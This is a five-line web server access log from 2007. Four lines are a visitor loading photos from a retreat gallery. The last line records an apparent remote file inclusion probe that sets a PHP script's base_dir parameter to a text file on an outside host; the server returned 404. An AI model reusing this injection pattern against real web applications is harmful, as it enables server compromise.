198.74.36.92 - - [18/Dec/2007:12:00:55 -0800] "GET /retreat1/IMG_2739.JPG HTTP/1.1" 200 2686976 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
198.74.36.92 - - [18/Dec/2007:12:01:03 -0800] "GET /retreat1/IMG_2755.JPG HTTP/1.1" 200 2276944 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
198.74.36.92 - - [18/Dec/2007:12:01:10 -0800] "GET /retreat1/IMG_2767.JPG HTTP/1.1" 200 2293760 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
198.74.36.92 - - [18/Dec/2007:12:01:17 -0800] "GET /retreat1/IMG_2765.JPG HTTP/1.1" 200 2752512 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
209.190.23.66 - - [18/Dec/2007:12:01:20 -0800] "GET /Encoder.php?base_dir=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
